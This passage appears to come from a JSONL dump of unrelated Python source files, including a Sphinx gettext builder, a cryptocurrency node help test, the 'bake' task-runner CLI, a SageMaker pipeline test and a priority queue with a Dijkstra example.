origin.uid))\n\n\nclass MsgOrigin(object):\n \"\"\"\n Origin holder for Catalog message origin.\n \"\"\"\n\n def __init__(self, source, line):\n self.source = source\n self.line = line\n self.uid = uuid4().hex\n\n\nclass I18nBuilder(Builder):\n \"\"\"\n General i18n builder.\n \"\"\"\n name = 'i18n'\n versioning_method = 'text'\n versioning_compare = None # be set by `gettext_uuid`\n\n def __init__(self, app):\n self.versioning_compare = app.env.config.gettext_uuid\n super(I18nBuilder, self).__init__(app)\n\n def init(self):\n Builder.init(self)\n self.catalogs = defaultdict(Catalog)\n\n def get_target_uri(self, docname, typ=None):\n return ''\n\n def get_outdated_docs(self):\n return self.env.found_docs\n\n def prepare_writing(self, docnames):\n return\n\n def compile_catalogs(self, catalogs, message):\n return\n\n def write_doc(self, docname, doctree):\n catalog = self.catalogs[find_catalog(docname,\n self.config.gettext_compact)]\n\n for node, msg in extract_messages(doctree):\n catalog.add(msg, node)\n\n if 'index' in self.env.config.gettext_enables:\n # Extract 
translatable messages from index entries.\n for node, entries in traverse_translatable_index(doctree):\n for typ, msg, tid, main in entries:\n for m in split_index_msg(typ, msg):\n if typ == 'pair' and m in pairindextypes.values():\n # avoid built-in translated message was incorporated\n # in 'sphinx.util.nodes.process_index_entry'\n continue\n catalog.add(m, node)\n\n\n# determine tzoffset once to remain unaffected by DST change during build\ntimestamp = time()\ntzdelta = datetime.fromtimestamp(timestamp) - \\\n datetime.utcfromtimestamp(timestamp)\n\nclass LocalTimeZone(tzinfo):\n\n def __init__(self, *args, **kw):\n super(LocalTimeZone, self).__init__(*args, **kw)\n self.tzdelta = tzdelta\n\n def utcoffset(self, dt):\n return self.tzdelta\n\n def dst(self, dt):\n return timedelta(0)\n\nltz = LocalTimeZone()\n\n\nclass MessageCatalogBuilder(I18nBuilder):\n \"\"\"\n Builds gettext-style message catalogs (.pot files).\n \"\"\"\n name = 'gettext'\n\n def init(self):\n I18nBuilder.init(self)\n self.create_template_bridge()\n self.templates.init(self)\n\n def _collect_templates(self):\n template_files = set()\n for template_path in self.config.templates_path:\n tmpl_abs_path = path.join(self.app.srcdir, template_path)\n for dirpath, dirs, files in walk(tmpl_abs_path):\n for fn in files:\n if fn.endswith('.html'):\n filename = path.join(dirpath, fn)\n filename = filename.replace(path.sep, SEP)\n template_files.add(filename)\n return template_files\n\n def _extract_from_template(self):\n files = self._collect_templates()\n self.info(bold('building [%s]: ' % self.name), nonl=1)\n self.info('targets for %d template files' % len(files))\n\n extract_translations = self.templates.environment.extract_translations\n\n for template in self.app.status_iterator(\n files, 'reading templates... ', purple, len(files)):\n with open(template, 'r', encoding='utf-8') as f:\n context = f.read()\n for line, meth, msg in extract_translations(context):\n origin = MsgOrigin(template, line)\n self.catalogs['sphinx'].add(msg, origin)\n\n def build(self, docnames, summary=None, method='update'):\n self._extract_from_template()\n I18nBuilder.build(self, docnames, summary, method)\n\n def finish(self):\n I18nBuilder.finish(self)\n data = dict(\n version = self.config.version,\n copyright = self.config.copyright,\n project = self.config.project,\n ctime = datetime.fromtimestamp(\n timestamp, ltz).strftime('%Y-%m-%d %H:%M%z'),\n )\n for textdomain, catalog in self.app.status_iterator(\n iteritems(self.catalogs), \"writing message catalogs... \",\n darkgreen, len(self.catalogs),\n lambda textdomain__: textdomain__[0]):\n # noop if config.gettext_compact is set\n ensuredir(path.join(self.outdir, path.dirname(textdomain)))\n\n pofn = path.join(self.outdir, textdomain + '.pot')\n pofile = open(pofn, 'w', encoding='utf-8')\n try:\n pofile.write(POHEADER % data)\n\n for message in catalog.messages:\n positions = catalog.metadata[message]\n\n if self.config.gettext_location:\n # generate \"#: file1:line1\\n#: file2:line2 ...\"\n pofile.write(\"#: %s\\n\" % \"\\n#: \".join(\"%s:%s\" %\n (safe_relpath(source, self.outdir), line)\n for source, line, _ in positions))\n if self.config.gettext_uuid:\n # generate \"# uuid1\\n# uuid2\\n ...\"\n pofile.write(\"# %s\\n\" % \"\\n# \".join(\n uid for _, _, uid in positions))\n\n # message contains *one* line of text ready for translation\n message = message.replace('\\\\', r'\\\\'). \\\n replace('\"', r'\\\"'). 
\\\n replace('\\n', '\\\\n\"\\n\"')\n pofile.write('msgid \"%s\"\\nmsgstr \"\"\\n\\n' % message)\n\n finally:\n pofile.close()\n"} {"ext": "py", "sha": "1a2f5fe5fbbe5ca306f72443569c2a9f39d15f63", "content": "import json\nfrom pathlib import Path\nfrom typing import List, Optional\n\n\nclass ConfJSON:\n def __init__(self, dir_path: Path, name: str, prefix: str):\n self._dir_path = dir_path\n self.name = f'{prefix.rstrip(\"-\")}-{name}'\n self._file_path = dir_path / name\n self.path = str(self._file_path)\n self.write_json()\n\n def write_json(\n self,\n tests: Optional[List[str]] = None,\n skipped_tests: Optional[List[str]] = None,\n skipped_integrations: Optional[List[str]] = None,\n nightly_integrations: Optional[List[str]] = None,\n unmockable_integrations: Optional[List[str]] = None,\n docker_thresholds: Optional[dict] = None\n ):\n if tests is None:\n tests = []\n if skipped_tests is None:\n skipped_tests = None\n if skipped_integrations is None:\n skipped_integrations = []\n if nightly_integrations is None:\n nightly_integrations = []\n if unmockable_integrations is None:\n unmockable_integrations = []\n if docker_thresholds is None:\n docker_thresholds = {}\n self._file_path.write_text(json.dumps({\n 'tests': tests,\n 'skipped_tests': skipped_tests,\n 'skipped_integrations': skipped_integrations,\n 'nightly_integrations': nightly_integrations,\n 'unmockable_integrations': unmockable_integrations,\n 'docker_thresholds': docker_thresholds\n }))\n"} {"ext": "py", "sha": "1a2f60261566d276f5c5ef5e24872b2879b4b4a5", "content": "#!/usr/bin/env python3\n# Copyright (c) 2018-2020 The Wflscoin Core developers\n# Distributed under the MIT software license, see the accompanying\n# file COPYING or http://www.opensource.org/licenses/mit-license.php.\n\"\"\"Verify that starting wflscoin with -h works as expected.\"\"\"\n\nfrom test_framework.test_framework import WflscoinTestFramework\nfrom test_framework.util import assert_equal\n\nclass HelpTest(WflscoinTestFramework):\n def set_test_params(self):\n self.setup_clean_chain = True\n self.num_nodes = 1\n\n def setup_network(self):\n self.add_nodes(self.num_nodes)\n # Don't start the node\n\n def get_node_output(self, *, ret_code_expected):\n ret_code = self.nodes[0].process.wait(timeout=60)\n assert_equal(ret_code, ret_code_expected)\n self.nodes[0].stdout.seek(0)\n self.nodes[0].stderr.seek(0)\n out = self.nodes[0].stdout.read()\n err = self.nodes[0].stderr.read()\n self.nodes[0].stdout.close()\n self.nodes[0].stderr.close()\n\n # Clean up TestNode state\n self.nodes[0].running = False\n self.nodes[0].process = None\n self.nodes[0].rpc_connected = False\n self.nodes[0].rpc = None\n\n return out, err\n\n def run_test(self):\n self.log.info(\"Start wflscoin with -h for help text\")\n self.nodes[0].start(extra_args=['-h'])\n # Node should exit immediately and output help to stdout.\n output, _ = self.get_node_output(ret_code_expected=0)\n assert b'Options' in output\n self.log.info(\"Help text received: {} (...)\".format(output[0:60]))\n\n self.log.info(\"Start wflscoin with -version for version information\")\n self.nodes[0].start(extra_args=['-version'])\n # Node should exit immediately and output version to stdout.\n output, _ = self.get_node_output(ret_code_expected=0)\n assert b'version' in output\n self.log.info(\"Version text received: {} (...)\".format(output[0:60]))\n\n # Test that arguments not in the help results in an error\n self.log.info(\"Start wflscoind with -fakearg to make sure it does not start\")\n 
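# An unrecognized option should make wflscoind exit with code 1 and report a parse error on stderr.\n        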
self.nodes[0].start(extra_args=['-fakearg'])\n # Node should exit immediately and output an error to stderr\n _, output = self.get_node_output(ret_code_expected=1)\n assert b'Error parsing command line arguments' in output\n self.log.info(\"Error message received: {} (...)\".format(output[0:60]))\n\n\nif __name__ == '__main__':\n HelpTest().main()\n"} {"ext": "py", "sha": "1a2f605bcd11fe30ea2f2421b0d5b8ff8242ff8a", "content": "import sys\nimport click\nimport json\nimport random\n\nfrom .bakefile import Bakefile, TaskFilter\nfrom .exceptions import NoBakefileFound\nfrom .clint import eng_join\n\nimport pygments\nimport pygments.lexers\nimport pygments.formatters\n\nfrom .constants import SKIP_NEXT, SAFE_ENVIRONS\n\n\ndef indent(line):\n return f'{\" \" * 4}{line}'\n\n\ndef do_help(exit=0):\n with click.Context(entrypoint) as ctx:\n help = entrypoint.get_help(ctx)\n help = help.replace(\n \" bake\",\n str(click.style(\" $ \", fg=\"green\", bold=True))\n + str(click.style(\"bake\", fg=\"yellow\", bold=True)),\n )\n help = help.replace(\n \"the strangely familiar task–runner\",\n str(\n click.style(\"the strangely familiar task–runner\", fg=\"white\", bold=True)\n ),\n )\n help = help.replace(\n \"Options\", str(click.style(\"Options\", fg=\"white\", bold=True))\n )\n\n help = help.replace(\n \"--insecure\", str(click.style(\"--insecure\", fg=\"red\", bold=True))\n )\n help = help.replace(\"--yes\", str(click.style(\"--yes\", fg=\"red\", bold=True)))\n help = help.replace(\n \"--allow\", str(click.style(\"--allow\", fg=\"green\", bold=True))\n )\n help = help.replace(\n \"--no-deps\", str(click.style(\"--no-deps\", fg=\"yellow\", bold=True))\n )\n help = help.replace(\n \"--continue\", str(click.style(\"--continue\", fg=\"red\", bold=True))\n )\n help = help.replace(\n \"--environ-json\", str(click.style(\"--environ-json\", fg=\"green\", bold=True))\n )\n help = help.replace(\"-e,\", str(click.style(\"-e\", fg=\"green\", bold=True) + \",\"))\n\n click.echo(help, err=True)\n sys.exit(exit)\n\n\ndef echo_json(obj):\n _json = json.dumps(obj, indent=2)\n\n if sys.stdin.isatty():\n _json = pygments.highlight(\n _json, pygments.lexers.JsonLexer(), pygments.formatters.TerminalFormatter()\n )\n\n click.echo(_json, err=False)\n\n\n@click.command(context_settings=dict(help_option_names=[\"-h\", \"--help\"]))\n@click.argument(\n \"task\",\n type=click.STRING,\n default=\"__LIST_ALL__\",\n envvar=\"BAKE_TASK\",\n # required=False,\n)\n@click.option(\n \"--bakefile\",\n \"-b\",\n default=\"__BAKEFILE__\",\n envvar=\"BAKEFILE_PATH\",\n nargs=1,\n type=click.Path(),\n help=\"The Bakefile to use.\",\n)\n@click.option(\n \"--list\",\n \"_list\",\n default=False,\n is_flag=True,\n help=\"Lists available tasks (and their dependencies).\",\n)\n@click.option(\n \"--levels\",\n \"-l\",\n default=None,\n nargs=1,\n type=click.INT,\n help=\"List only a given number of '/' levels of tasks.\",\n)\n@click.option(\n \"--help\", \"-h\", default=False, is_flag=True, help=\"Show this message and exit.\"\n)\n@click.option(\"--debug\", default=False, is_flag=True, hidden=True)\n@click.option(\"--source\", default=False, nargs=1, hidden=True)\n@click.option(\n \"--allow\",\n default=False,\n nargs=1,\n multiple=True,\n hidden=False,\n help=\"Whitelist an environment variable for use.\",\n)\n@click.option(\n \"--no-deps\",\n default=False,\n is_flag=True,\n hidden=False,\n help=\"Do not run dependent tasks.\",\n)\n@click.option(\"--yes\", is_flag=True, help=\"Set medium–security prompts to yes.\")\n@click.option(\n 
\"--continue\",\n \"_continue\",\n is_flag=True,\n # type=click.BOOL,\n help=\"Continue, if a task fails.\",\n)\n@click.option(\n \"--interactive\",\n \"-i\",\n is_flag=True,\n # type=click.BOOL,\n help=\"Run in interactive mode.\",\n)\n@click.option(\n \"--insecure\",\n is_flag=True,\n # type=click.BOOL,\n help=\"Inherit parent shell's environment variables.\",\n)\n@click.argument(\"arguments\", nargs=-1, type=click.STRING)\n@click.option(\n \"--silent\",\n \"-s\",\n is_flag=True,\n # type=click.BOOL,\n help=\"Reduce output.\",\n envvar=\"BAKE_SILENT\",\n)\n@click.option(\n \"--sort\", is_flag=True, type=click.BOOL, help=\"Sort tasks, alphabetially.\"\n)\n@click.option(\n \"--environ-json\",\n \"-e\",\n nargs=1,\n type=click.STRING,\n help=\"Provide environment variables via JSON.\",\n)\n@click.option(\n \"--json\",\n \"-j\",\n \"_json\",\n is_flag=True,\n # type=click.BOOL,\n help=\"Output in JSON format (stdout).\",\n)\ndef entrypoint(\n *,\n task,\n bakefile,\n arguments,\n _list,\n levels,\n _continue,\n environ_json,\n debug,\n silent,\n sort,\n insecure,\n allow,\n _json,\n no_deps,\n interactive,\n yes,\n help,\n source,\n):\n \"\"\"bake — the strangely familiar task–runner.\"\"\"\n\n if help:\n do_help(0)\n\n # Default to list behavior, when no task is provided.\n if _json or source:\n silent = True\n\n # Allow explicitly–passed environment variables.\n SAFE_ENVIRONS.extend(allow)\n\n # Enable list functionality, by default.\n if task == \"__LIST_ALL__\":\n _list = True\n task = None\n\n # Establish the Bakefile.\n try:\n if bakefile == \"__BAKEFILE__\":\n bakefile = Bakefile.find(root=\".\", filename=\"Bakefile\")\n else:\n bakefile = Bakefile(path=bakefile)\n\n except NoBakefileFound:\n click.echo(click.style(\"No Bakefile found!\", fg=\"red\"), err=True)\n do_help(1)\n sys.exit(0)\n\n if debug:\n click.echo(f\" + Bakefile: {bakefile.path}\", err=True)\n\n # --source (internal API)\n if source:\n\n def echo_generator(g):\n for g in g:\n click.echo(g)\n\n if source == \"__init__\":\n source = random.choice(list(bakefile.tasks.keys()))\n task = bakefile.tasks[source]\n source = task.gen_source(\n sources=[task.bashfile.funcs_source, task.bashfile.root_source]\n )\n else:\n task = bakefile.tasks[source]\n source = task.gen_source(\n sources=[\n task.bashfile.funcs_source,\n task.bashfile.root_source,\n task.source,\n ]\n )\n\n for source_line in source:\n click.echo(source_line)\n sys.exit(0)\n\n if not insecure:\n for key in bakefile.environ:\n if key not in SAFE_ENVIRONS:\n del bakefile.environ[key]\n\n if environ_json:\n bakefile.add_environ_json(environ_json)\n\n argv = []\n environ = []\n\n for i, argument in enumerate(arguments[:]):\n if \"=\" in argument:\n key, value = argument.split(\"=\", 1)\n environ.append((key, value))\n else:\n argv.append(argument)\n\n if debug:\n click.echo(f\" + argv: {argv!r}\", err=True)\n click.echo(f\" + environ: {environ!r}\", err=True)\n click.echo(err=True)\n for env in environ:\n key, value = env\n if debug:\n click.echo(\n f\" + Setting environ: {click.style(key, fg='red')} {click.style('=', fg='white')} {value}.\",\n err=True,\n )\n bakefile.add_environ(key, value)\n\n bakefile.add_args(*argv)\n\n if _list:\n __list_json = {\"tasks\": {}}\n\n # Enable level filtering.\n if levels is not None:\n task_list = []\n for _task in bakefile.tasks:\n if len(_task.split(\"/\")) <= levels:\n task_list.append(_task)\n else:\n task_list = bakefile.tasks\n\n if sort:\n task_list = sorted(task_list)\n\n for _task in task_list:\n depends_on = 
bakefile[_task].depends_on(\n include_filters=False, recursive=True\n )\n\n if no_deps:\n depends_on = ()\n\n if depends_on:\n deps = [str(a) for a in depends_on]\n deps = f\"\\n {click.style('+', fg='yellow', bold=True)} {eng_join(deps, conj='&')}.\"\n else:\n deps = \"\"\n colon = \"\" if not deps else \"…\"\n\n __list_json[\"tasks\"].update(\n {_task: {\"depends_on\": [str(d) for d in depends_on]}}\n )\n\n if not silent:\n click.echo(\n f\" {click.style('-', fg='green', bold=True)} {click.style(_task, bold=True)}{colon}{deps}\",\n err=False,\n )\n\n if not silent:\n tasks_unechoed = len(bakefile.tasks) - len(task_list)\n\n if tasks_unechoed:\n bake_command = str(click.style(f\"bake --levels {levels + 1}\", fg=\"red\"))\n click.echo(\n f\"Note: {tasks_unechoed} more tasks are available. \"\n f\"Please use $ {bake_command} to see more.\",\n err=True,\n )\n\n if _json:\n echo_json(__list_json)\n\n sys.exit(0)\n\n if task:\n try:\n task = bakefile[task]\n except KeyError:\n click.echo(click.style(f\"Task {task} does not exist!\", fg=\"red\"))\n sys.exit(1)\n\n def execute_task(task, *, silent=False):\n try:\n edges = list(bakefile.graph.out_edges(task))[0]\n except IndexError:\n edges = list()\n\n skips = []\n for edge in edges:\n if edge.do_skip is not None:\n skips.append(edge.do_skip)\n\n if not all(skips or [False]):\n # TODO: fully implement this?\n if \"@\" in f\"{task}\":\n silent = True\n\n if not silent:\n click.echo(\n click.style(\" + \", fg=\"white\")\n + click.style(f\"Executing {task}\", fg=\"yellow\")\n + click.style(\":\", fg=\"white\"),\n err=True,\n )\n usually_bash_task = task.execute(\n yes=yes, debug=debug, silent=silent, interactive=interactive\n )\n\n if not _continue:\n if hasattr(usually_bash_task, \"ok\"):\n\n if usually_bash_task.return_code > 0:\n if not silent:\n click.echo(\n click.style(f\"Task {task} failed!\", fg=\"red\"),\n err=True,\n )\n sys.exit(usually_bash_task.return_code)\n\n # This happens when it's a task filter.\n elif isinstance(usually_bash_task, tuple):\n key, value = (\n usually_bash_task\n ) # But, in this instance, clearly isn't.\n else:\n click.echo(\n click.style(\" + \", fg=\"green\")\n + click.style(f\"Skipping {task}\", fg=\"white\")\n + click.style(\".\", fg=\"white\"),\n err=True,\n )\n\n if not no_deps:\n tasks = task.depends_on(recursive=True) + [task]\n\n else:\n tasks = [task]\n\n for task in tasks:\n execute_task(task, silent=silent)\n\n if not silent:\n click.echo(\n click.style(\" + \", fg=\"white\")\n + click.style(\"Done\", fg=\"green\")\n + click.style(\".\", fg=\"white\"),\n err=True,\n )\n sys.exit(0)\n\n\nif __name__ == \"__main__\":\n entrypoint()\n"} {"ext": "py", "sha": "1a2f608c401acef3ba3d11f0434bb677bdceb6bc", "content": "#!/usr/bin/python3\n\nARD_DEVICE_ID = \"1\"\n\nADC_READ_INTERVAL = 0.1\nADC_KEEP_VALS = 20\nLIGHT_KEEP_VALS = 20\n\nLOGFILE = \"./logs/smarthome.log\"\n\n# --- Unicodes --- #\nHOME = ' ⌂'\nHOMEON = ' ☗'\nKEY = ' ⚿'\nCLOUD = ' ☁'\nSTAR = ' ★'\nSUN = ' ☀'\nREFRESH = ' 🗘'\nCHECKED = ' ✔'\nPOINT = ' ☛'\nMISSING = ' ✘'\nMODESSYMBOL = ' ❖'\nMENUSYMBOL = ' ☰'\nTERMOMETER = ' 🌡'\nMUSIC = ' ♫'\nEMAIL = ' ✉'\nNOTIFICATION = ' 🔔'\nDEGREES = ' °C'\nSMILE = ' ☺'\nMOON = ' ☾'\nQUATER_MOON = '☽'\nPEACE = ' ☮'\n\n# --- Modes --- #\n\nLIGHT_TRESHOLD = 400\n\n"} {"ext": "py", "sha": "1a2f60af2272be77ef975238d91156b2983a193a", "content": "# the required python libraries imported\nimport pandas as pd\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom trcrpm import TRCRP_Mixture\nfrom 
collections import Counter\nprint \"fuck yeah\"\ndata = pd.read_csv(\"./data/anomaly0245.csv\", index_col=0)\ndata = data.iloc[156600:240000].reset_index(drop=True)\n\n# Setup the placekeeping and initilizing variables\nchain = 0\nx, eng_val, states, num_states = [], [], [], []\ni = 0\nstep = 30\nprint(i)\n\nrng = np.random.RandomState(1)\nmodel = TRCRP_Mixture(chains=1, lag=10, variables=data.columns, rng=rng)\nmodel.incorporate(data[i:i + step])\nmodel.resample_all(seconds=10)\nmodel.resample_hyperparameters(seconds=10)\ns = model.get_temporal_regimes('anomaly')[chain]\nnum_states = step * [len(sorted(set(s)))]\nstates = list(s[i:i + step])\neng_val = data.iloc[i:i + step, 0].tolist()\nx = list(range(i, i + step ))\n\nfor i in range(step, len(data) - step, step):\n model.incorporate(data[i:i + step])\n model.resample_all(seconds=10)\n model.resample_hyperparameters(seconds=10)\n s = model.get_temporal_regimes(\"anomaly\")[chain]\n num_states = step * [len(sorted(set(s)))]\n states = list(s[i:i + step])\n eng_val = data.iloc[i:i + step, 0].tolist()\n x = list(range(i, i + step ))\n print(i)"} {"ext": "py", "sha": "1a2f60bade4f75181ad28d3e096599995bccdd46", "content": "import pytest\nimport os\nimport utils\nimport io\nimport numpy\nimport json\nimport pickle\nimport gzip\n\nfrom utils import kfp_client_utils\nfrom utils import minio_utils\nfrom utils import sagemaker_utils\n\n\ndef run_predict_mnist(boto3_session, endpoint_name, download_dir):\n \"\"\" https://github.com/awslabs/amazon-sagemaker-examples/blob/a8c20eeb72dc7d3e94aaaf28be5bf7d7cd5695cb\n /sagemaker-python-sdk/1P_kmeans_lowlevel/kmeans_mnist_lowlevel.ipynb \"\"\"\n # Download and load dataset\n region = boto3_session.region_name\n download_path = os.path.join(download_dir, \"mnist.pkl.gz\")\n boto3_session.resource(\"s3\", region_name=region).Bucket(\n \"sagemaker-sample-data-{}\".format(region)\n ).download_file(\"algorithms/kmeans/mnist/mnist.pkl.gz\", download_path)\n with gzip.open(download_path, \"rb\") as f:\n train_set, valid_set, test_set = pickle.load(f, encoding=\"latin1\")\n\n # Function to create a csv from numpy array\n def np2csv(arr):\n csv = io.BytesIO()\n numpy.savetxt(csv, arr, delimiter=\",\", fmt=\"%g\")\n return csv.getvalue().decode().rstrip()\n\n # Run prediction on an image\n runtime = boto3_session.client(\"sagemaker-runtime\")\n payload = np2csv(train_set[0][30:31])\n\n response = runtime.invoke_endpoint(\n EndpointName=endpoint_name, ContentType=\"text/csv\", Body=payload,\n )\n return json.loads(response[\"Body\"].read().decode())\n\n\n@pytest.mark.parametrize(\n \"test_file_dir\",\n [\n pytest.param(\n \"resources/config/kmeans-mnist-endpoint\", marks=pytest.mark.canary_test\n )\n ],\n)\ndef test_create_endpoint(\n kfp_client, experiment_id, boto3_session, sagemaker_client, test_file_dir\n):\n\n download_dir = utils.mkdir(os.path.join(test_file_dir + \"/generated\"))\n test_params = utils.load_params(\n utils.replace_placeholders(\n os.path.join(test_file_dir, \"config.yaml\"),\n os.path.join(download_dir, \"config.yaml\"),\n )\n )\n\n # Generate random prefix for model, endpoint config and endpoint name\n # to avoid errors if resources with same name exists\n test_params[\"Arguments\"][\"model_name\"] = test_params[\"Arguments\"][\n \"endpoint_config_name\"\n ] = test_params[\"Arguments\"][\"endpoint_name\"] = input_endpoint_name = (\n utils.generate_random_string(5) + \"-\" + test_params[\"Arguments\"][\"model_name\"]\n )\n print(f\"running test with model/endpoint name: 
{input_endpoint_name}\")\n\n _, _, workflow_json = kfp_client_utils.compile_run_monitor_pipeline(\n kfp_client,\n experiment_id,\n test_params[\"PipelineDefinition\"],\n test_params[\"Arguments\"],\n download_dir,\n test_params[\"TestName\"],\n test_params[\"Timeout\"],\n )\n\n try:\n outputs = {\"sagemaker-deploy-model\": [\"endpoint_name\"]}\n\n output_files = minio_utils.artifact_download_iterator(\n workflow_json, outputs, download_dir\n )\n\n output_endpoint_name = utils.read_from_file_in_tar(\n output_files[\"sagemaker-deploy-model\"][\"endpoint_name\"]\n )\n print(f\"endpoint name: {output_endpoint_name}\")\n\n # Verify output from pipeline is endpoint name\n assert output_endpoint_name == input_endpoint_name\n\n # Verify endpoint is running\n assert (\n sagemaker_utils.describe_endpoint(sagemaker_client, input_endpoint_name)[\n \"EndpointStatus\"\n ]\n == \"InService\"\n )\n\n # Validate the model for use by running a prediction\n result = run_predict_mnist(boto3_session, input_endpoint_name, download_dir)\n print(f\"prediction result: {result}\")\n assert json.dumps(result, sort_keys=True) == json.dumps(\n test_params[\"ExpectedPrediction\"], sort_keys=True\n )\n utils.remove_dir(download_dir)\n finally:\n # delete endpoint\n sagemaker_utils.delete_endpoint(sagemaker_client, input_endpoint_name)\n"} {"ext": "py", "sha": "1a2f616e58fa30c08acda8dc2317540f88f15600", "content": "# proxy module\nfrom pyface.ui.wx.grid.trait_grid_cell_adapter import *\n"} {"ext": "py", "sha": "1a2f62375f668ee9479eedce51823352feb3e903", "content": "default_app_config = 'sandbox.order.apps.OrderConfig'\n"} {"ext": "py", "sha": "1a2f628c8110b8d4f0d62d7b9055720ae4baad17", "content": "import random\n\nclass PriQ(object):\n '''Binary-Heap based Priority Queue with uniquely named elements, name may \\\nbe any hashable type. Defaults to min-heap, set maxpq=True for max-heap. 
\\\nPublic methods: put, get, remove, update, contains, front, get_priority.'''\n \n def __init__(self, maxpq = False):\n self.q =[] # The priority queue, contains (priority, name) tuples\n self.elements = {} # Dict of all elements currently in queue, with current index\n self.maxmod = -1 if maxpq else 1 # modify pq to max instead of min\n\n def __len__(self):\n return len(self.q)\n \n def __str__(self):\n return str(self.q)\n\n def _propUp(self, index):\n '''Propagate up element to proper place in binary heap'''\n current = index\n while current > 0:\n parent = (current - 1) // 2 # parent node\n # swap with parent until parent <= child (>= for maxPQ)\n if self.q[parent][0] * self.maxmod <= self.q[current][0] * self.maxmod:\n break\n self.elements[self.q[current][1]], self.elements[self.q[parent][1]] = parent, current\n self.q[parent], self.q[current] = self.q[current], self.q[parent]\n current = parent\n\n def _propDown(self, index):\n '''Propagate down element to proper place in binary heap'''\n if len(self.q) == 1:\n self.elements[self.q[0][1]] = 0 # update index of last element\n current = index\n while current * 2 + 1 < len(self.q): # node has a child\n left, right = current * 2 + 1, current * 2 + 2\n if right == len(self.q): # left child only\n if self.q[current][0] * self.maxmod >= self.q[left][0] * self.maxmod:\n # swap with left child and update elements dict\n self.elements[self.q[current][1]], self.elements[self.q[left][1]] = left, current\n self.q[current], self.q[left] = self.q[left], self.q[current]\n break\n if self.maxmod == 1: # min PQ\n minChild = left if self.q[left] <= self.q[right] else right\n if self.q[current] <= self.q[minChild]: # swap with lowest priority child as needed\n break\n self.elements[self.q[current][1]], self.elements[self.q[minChild][1]] = minChild, current\n self.q[current], self.q[minChild] = self.q[minChild], self.q[current]\n current = minChild\n else: # max PQ\n maxChild = left if self.q[left] >= self.q[right] else right\n if self.q[current] >= self.q[maxChild]: # swap with highest priority child as needed\n break\n self.elements[self.q[current][1]], self.elements[self.q[maxChild][1]] = maxChild, current\n self.q[current], self.q[maxChild] = self.q[maxChild], self.q[current]\n current = maxChild\n\n def put(self, name, priority):\n '''Add named element to priorty queue and place in binary heap'''\n if self.contains(name): return ValueError(name)\n self.q.append((priority, name))\n self.elements[name] = len(self.q) - 1\n self._propUp(self.elements[name])\n\n def front(self):\n '''Element at front of queue'''\n return self.q[0]\n\n def get_priority(self, name):\n '''Current priority of named element'''\n return self.q[self.elements[name]][0]\n\n def get(self):\n '''Return element at front of queue and re-heapify queue'''\n if not self.q: \n return False # empty queue\n result = self.q[0]\n del(self.elements[result[1]])\n if len(self.q) > 1:\n self.q[0] = self.q.pop()\n self._propDown(0)\n else:\n self.q = []\n self.elements = {}\n return result\n\n def update(self, name, priority):\n '''Change priority of named element and re-heapify'''\n if not self.contains(name): return ValueError(name)\n index = self.elements[name]\n old_priority = self.q[index][0]\n self.q[index] = (priority, name)\n if priority * self.maxmod < old_priority * self.maxmod:\n self._propUp(index)\n if priority * self.maxmod > old_priority * self.maxmod:\n self._propDown(index)\n\n def contains(self, name):\n '''True if name currently exists in the queue'''\n return (name in 
self.elements)\n\n def remove(self, name):\n '''Remove named element and re-heapify'''\n if not self.contains(name): return ValueError(name)\n index = self.elements[name]\n old_priority = self.q[index][0]\n del(self.elements[name])\n if len(self.q) > 1:\n self.q[index] = self.q.pop() # replace with last item in queue\n self.elements[self.q[index][1]] = index\n # re-heapify\n if self.q[index][0] * self.maxmod < old_priority * self.maxmod:\n self._propUp(index) \n elif self.q[index][0] * self.maxmod > old_priority * self.maxmod:\n self._propDown(index)\n else:\n self.q = []\n\n###############################################################################\n# Following are examples, including Dijkstra's shortest path\n###############################################################################\n\nif __name__ == \"__main__\":\n # Sequential letter names with random integer weights (demonstration)\n pq = PriQ()\n name = 'a'\n for _ in range(26):\n pq.put(name, random.randint(1,99))\n name = chr(ord(name) + 1)\n print(\"Initial: ['a'-'z' = randint(1,99)]\\n\", pq, \"\\nLength: \", len(pq))\n print(\"Priority of 'a':\", pq.get_priority('a'))\n print(\"Front:\", pq.front())\n pq.put('a', 17) # testing for duplicate put\n pq.update('a', 1)\n pq.update('b', 99)\n print(\"After updating 'a' to 1 and 'b' to 99:\\n\", pq)\n pq.remove('c')\n print(\"After removing 'c':\\n\", pq)\n print(\"Contains 'c'?\", pq.contains('c'))\n print(\"Get elements until empty:\")\n while pq:\n print(pq.get(), \"contains 'd'?\", pq.contains('d'))\n\n '''\n # Max-heap priority queue with random float weights and integer names\n pq = PriQ(True)\n for i in range(20):\n pq.put(i, random.random())\n print(\"['1'-'20' = random()]:\\n\", pq)\n while pq: print(pq.get())\n '''\n\n # Dijkstra's shortest path algorithm example\n def dsp(G, s):\n '''Dijkstra's shortest path algorithm. Input: weighted graph G, an\\\n adjacency list mapping each named node to it's neighbors with a {name: weight}\\\n dict, and s, the name of the starting node. Outputs a mapping for each node\\\n to a tuple of (weight of shortest path, name of predecessor node).\n '''\n pq = PriQ()\n result = {}\n predecessor = {s: None}\n for key in G.keys():\n pq.put(key, 0 if key == s else float('inf'))\n while pq:\n cur_weight, cur_node = pq.get()\n result[cur_node] = (cur_weight, predecessor[cur_node])\n for adj in G[cur_node]: # for neighboring nodes\n # update weight from starting node if less than previous paths\n if adj not in result:\n if pq.get_priority(adj) > cur_weight + G[cur_node][adj]:\n pq.update(adj, cur_weight + G[cur_node][adj])\n predecessor[adj] = cur_node\n return result\n\n G = {\n 'a': {'b': 2, 'f': 6, 'c': 1},\n 'b': {'a': 2, 'd': 6, 'f': 3, 'g': 4},\n 'c': {'a': 1, 'f': 2, 'g': 3, 'e': 5},\n 'd': {'b': 6, 'f': 2, 'g': 1, 'h': 2},\n 'e': {'c': 5, 'f': 4, 'g': 2, 'h': 3},\n 'f': {'a': 6, 'b': 3, 'd': 2, 'g': 7, 'e': 4, 'c': 2},\n 'g': {'f': 7, 'b': 4, 'd': 1, 'h': 5, 'e': 2, 'c': 3},\n 'h': {'d': 2, 'g': 5, 'e': 3}\n }\n print(\n '''\n B 6 D\n 2 3 2 4 1 2\n A 6 F 7 G 5 H\n 1 2 3 4 2 3\n C 5 E\n ''')\n print(\"\\nCalculating shortest paths with Dijkstra's algorithm...\")\n print(\"Shortest paths from 'a':\", dsp(G, 'a'))\n print(\"Shortest paths from 'd':\", dsp(G, 'd'))"} {"ext": "py", "sha": "1a2f631f3f1e62117c3b1a341897500e1a37b9f4", "content": "# Lint as: python3\n# Copyright 2019 The TensorFlow Authors. 
